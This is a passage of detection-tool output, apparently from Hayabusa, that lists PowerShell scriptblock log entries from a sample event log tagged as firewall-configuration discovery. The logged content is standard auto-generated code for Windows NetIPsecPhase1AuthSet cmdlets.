(@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 